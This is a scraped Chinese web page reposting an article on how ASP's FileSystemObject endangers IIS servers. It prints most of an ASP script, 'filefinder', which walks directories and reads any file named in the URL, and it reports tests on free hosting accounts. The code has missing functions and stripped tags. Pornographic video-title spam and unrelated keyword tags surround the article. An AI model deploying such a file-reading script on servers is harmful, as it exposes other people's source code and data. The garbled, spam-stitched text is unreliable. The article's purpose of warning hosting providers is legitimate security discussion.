校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁 > 知識庫 > ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策

ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策

熱門標簽:怎么在地圖標注自己 縣域地圖標注打印店 萊西電子地圖標注 個人可以辦理400電話么 外呼系統API接口 鳳臺百度地圖標注店 武夷山旅游地圖標注 修改地圖標注 金昌電話機器人價格
scripting.filesystemobject 對象是由 scrrun.dll 提供的許多供 vbscript/jscript 控制的 com 對象之一。scripting.filesystemobject 提供了非常便利的文本文件和文件目錄的訪問,但是同時也對 iis web 服務器數據安全造成了一定的威脅。

filefinder 的代碼很簡單,由3 個函數和 30 行左右的順序代碼構成。

最關鍵的是 findfiles 函數,通過對它的遞歸調用實現對某個目錄的遍歷,并且按照特定的文件擴展名來搜尋這些文件。


function findfiles(strstartfolder, strext)

dim n

dim othisfolder

dim ofolders

dim ofiles

dim ofolder

dim ofile


' 如果系統管理員對文件系統的權限進行細致的設置話,下面的代碼就要出錯

' 但是有些目錄還是可以察看的,所以我們簡單的把錯誤忽略過去

on error resume next

n = 0

response.write "b>searching " strstartfolder "/b>br>"

set othisfolder = g_fs.getfolder(strstartfolder)

set ofiles = othisfolder.files

for each ofile in ofiles

' 如果是指定的文件擴展名,輸出連接導向本身,但用不同的命令 cmd

' 在這里是 cmd=read,即讀出指定物理路徑的文本文件

if issuffix(ofile.path, strext) then

response.write "a target=_blank href='ff.asp?cmd=readpath=" server.htmlencode(ofile.path) "'>font color='dodgerblue'>" ofile.path "/font>/a>br>"

if err = 0 then

n = n + 1

end if

end if

next

set ofolders = othisfolder.subfolders

for each ofolder in ofolders

n = n + findfiles(ofolder.path, strext)

next

findfiles = n

end function

下面的代碼是對 url 后面的參數進行分析:


' 讀出各個參數的值

strcmd = ucase(request.querystring("cmd"))

strpath = request.querystring("path")

strext = request.querystring("ext")

brawdata = ucase(request.querystring("raw"))

' 默認搜索 .asp 文件

if strpath = "" then

strpath = "."

end if

if strext = "" then

strext = ".asp"

end if


' 根據不同的命令 cmd 執行不同的代碼

select case strcmd

case "find"

response.write findfiles(strpath, strext) " file(s) found"

case "read"

if brawdata = "t" then

response.write readtextfile(strpath)

else

response.write "pre>" server.htmlencode(readtextfile(strpath)) "/pre>"

end if

case else

response.write "h3>please specify a command to execute/h3>"

end select

從上面的分析可以看出,如果有足夠的權限的話,我們就可以通過 filefinder 來查找 iis web 服務器上的任意文本文件,并且可以輕松的察看文件內容。對于非文本文件,可以確定他們是否存在及其所在路徑,這對于高級 hacker 們來說,這些信息有時是極其重要的。

但是這些對數據安全的威脅的前提條件是執行 ff.asp 的用戶至少擁有讀取目錄和文件的權限。由于 windows nt server 在安裝后的默認安全設置是所有用戶都可以“讀取”目錄和文件,所以不管是 iis 默認的你名用戶 iusr_servername 還是別的什么用戶,都可以順列的讀取目錄和文件的信息。而大多數 windows nt server系統管理員主要關心系統是否能夠運行的起來,一般不愿意去改動默認的目錄和文件權限,畢竟那樣做要冒很大的風險,而且需要很多次得經驗。所以,我們可以用 filefinder 來檢查作為 web 服務器的 nt server 的文件系統的安全設置是否安全。

作者專門對作為 iis web 服務器的文件系統的權限進行了人工設置,但限于沒有經驗,導致了許多奇怪的錯誤現象,如:所用的做實驗的 nt server 4.0 不能進行 access 數據庫的連接。而在進行文件系統權限改動之前,這些功能是正常的。

本著純粹研究的目的,作者還在我所申請的免費 asp 空間上作了試驗(包括 csdn 提供的我的個人主頁),結果是 filefinder 都可以順利運行。而在http://www2.domaindlx.com/index.html 申請的個人主頁卻沒有這個問題,可見這個免費 asp 主頁提供商在這方面做的還是比較認真的。盡管 domaindlx 的 web 服務器運行在 windows 2000 server 上的,其默認的文件系統的安全權限和 nt 4.0 沒有很大的差別。

由于作者的能力有限,就對這個問題討論到這里。僅以此文來向國內的 asp 主頁提供商提供參考意見,希望能對提供商和客戶雙方的數據安全都有所幫助。

附:用其它類似的服務器端腳本來運行的 web 服務,如果也提供類似 scripting.filesystemobject 的對文件系統操作的功能,不管什么平臺應該存在同樣的問題。

標簽:楚雄 清遠 涼山 通遼 上海 赤峰 邢臺 南京

巨人網絡通訊聲明:本文標題《ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策》,本文關鍵詞  ASP,中,FSO,對象,對,IIS,WEB,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策》相關的同類信息!
  • 本頁收集關于ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策的相關信息資訊供網民參考!
  • 推薦文章
    校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃
    亚洲青青青在线视频| 欧美激情资源网| 国产亚洲综合色| 国产精品综合二区| 中文字幕欧美三区| 色综合久久综合网| 亚洲乱码国产乱码精品精小说| 精品粉嫩超白一线天av| 激情综合五月天| 国产精品视频免费| 欧美丝袜丝nylons| 久久av老司机精品网站导航| 亚洲国产精品成人久久综合一区| 99在线精品免费| 亚洲曰韩产成在线| 久久久影视传媒| 色综合天天综合网国产成人综合天 | 一区二区三区中文字幕精品精品| 日本高清视频一区二区| 日韩av电影免费观看高清完整版 | 欧美极品美女视频| 精品婷婷伊人一区三区三| 激情久久五月天| 亚洲国产精品久久人人爱| 亚洲国产精品99久久久久久久久| 欧美日韩亚洲综合在线 欧美亚洲特黄一级 | 国产精品青草久久| 欧美视频一区二区| 成人午夜激情在线| 麻豆精品视频在线观看| 一区二区三区精密机械公司| 久久久久久久久久久电影| 在线不卡的av| 欧美在线观看18| 96av麻豆蜜桃一区二区| 国产激情视频一区二区在线观看| 亚洲成a人片综合在线| 亚洲免费在线观看视频| 国产精品欧美一区二区三区| 精品国产1区2区3区| 欧美电影在哪看比较好| 欧美做爰猛烈大尺度电影无法无天| 国产精品一卡二| 国产一区二区主播在线| 极品销魂美女一区二区三区| 免费观看日韩av| 热久久国产精品| 丝瓜av网站精品一区二区| 亚洲成av人综合在线观看| 亚洲激情在线激情| 一区二区欧美精品| 亚洲高清免费在线| 丝瓜av网站精品一区二区| 日本视频中文字幕一区二区三区| 天天色 色综合| 日韩av电影免费观看高清完整版在线观看| 亚洲国产你懂的| 三级久久三级久久| 精品一区二区影视| 国产剧情一区在线| heyzo一本久久综合| 一本色道久久综合精品竹菊| 91免费版在线| 欧美精选在线播放| 日韩欧美在线不卡| 国产午夜亚洲精品羞羞网站| 欧美国产国产综合| 亚洲最快最全在线视频| 蜜桃精品视频在线| 成人动漫一区二区在线| 日本韩国欧美一区| 91精品国产综合久久精品性色| 日韩亚洲欧美高清| 中文字幕不卡一区| 亚洲激情第一区| 毛片av一区二区三区| 国产高清成人在线| 欧洲人成人精品| 久久久久综合网| 亚洲免费av高清| 老司机精品视频导航| 成人性生交大片免费看视频在线| 91无套直看片红桃| 91精品国产综合久久精品| 国产日韩亚洲欧美综合| 一区二区在线看| 九九久久精品视频| 91国偷自产一区二区开放时间| 日韩一区二区高清| 中文字幕一区二区三区在线播放| 亚洲一区二区三区自拍| 国产麻豆视频一区二区| 欧美日韩免费一区二区三区| 国产亚洲一二三区| 日韩高清不卡在线| 91在线看国产| 久久麻豆一区二区| 日韩精品一二三四| 一本大道久久精品懂色aⅴ | 最新国产成人在线观看| 琪琪久久久久日韩精品| 91在线一区二区三区| 久久久久久久网| 午夜久久电影网| 91在线精品一区二区三区| 久久综合久久综合久久综合| 亚洲成人手机在线| 色综合久久久久综合体| 26uuu欧美日本| 日本午夜精品视频在线观看| 欧美在线不卡视频| 国产精品久久久久天堂| 国产乱淫av一区二区三区| 欧美日韩一卡二卡三卡| 日韩一区在线免费观看| 国产电影一区在线| www国产精品av| 91精选在线观看| 老汉av免费一区二区三区 | 欧美性猛交xxxxxx富婆| 国产精品视频在线看| 美女爽到高潮91| 欧美日韩综合一区| 一区二区三区在线视频观看| 成人永久免费视频| 久久久精品tv| 国产自产2019最新不卡| 欧美一区二区精品久久911| 欧美一区日本一区韩国一区| 欧美日韩国产美| 色综合久久中文综合久久牛| 韩国v欧美v日本v亚洲v| 五月天国产精品| 五月天欧美精品| 国产精品88888| 国产亚洲视频系列| 91精品麻豆日日躁夜夜躁| 水蜜桃久久夜色精品一区的特点| 国产精品视频看| 欧美激情综合五月色丁香| 欧美色综合影院| 精品久久久久久久久久久院品网 | 亚洲乱码日产精品bd| 欧美xxxxx牲另类人与| 在线播放欧美女士性生活| 亚洲成人在线免费| 国产三级精品三级在线专区| 国内精品国产成人国产三级粉色| 精品在线视频一区| 一区二区三区电影在线播| 伊人性伊人情综合网| 国产欧美精品一区二区色综合朱莉| 久久影院午夜论| 欧美在线视频你懂得| 国产在线一区观看| 一区二区中文字幕在线| 亚洲国产精品成人综合 | 老司机一区二区| 亚洲伊人伊色伊影伊综合网| 亚洲三级电影网站| 亚洲高清中文字幕| 日韩精品一二三区| 激情综合色播五月| 在线观看视频91| 欧美一级艳片视频免费观看| 国产亚洲一区二区三区在线观看 | 亚洲国产日韩精品| 国产精品18久久久久久久久久久久 | 日韩欧美视频在线| 日本特黄久久久高潮| 国产精品人成在线观看免费| 一本大道av一区二区在线播放 | 成人高清视频在线观看| 日日夜夜免费精品| 26uuu国产在线精品一区二区| 成人高清免费观看| 日本v片在线高清不卡在线观看| 久久伊人中文字幕| 欧洲人成人精品| 国产99精品在线观看| 天堂久久久久va久久久久| 国产精品乱子久久久久| 欧美一区二区在线观看| 色伊人久久综合中文字幕| 国产精品亚洲专一区二区三区| 亚洲成精国产精品女| 亚洲人成7777| 国产视频一区二区在线| 91麻豆精品国产自产在线 | 亚洲一区二区免费视频| 国产精品视频第一区| 精品美女一区二区| 91麻豆精品国产91久久久久久久久| 色哟哟国产精品免费观看| caoporn国产一区二区| 国产一区二区三区日韩| 美女网站一区二区| 美国欧美日韩国产在线播放| 洋洋成人永久网站入口| 亚洲视频免费在线观看|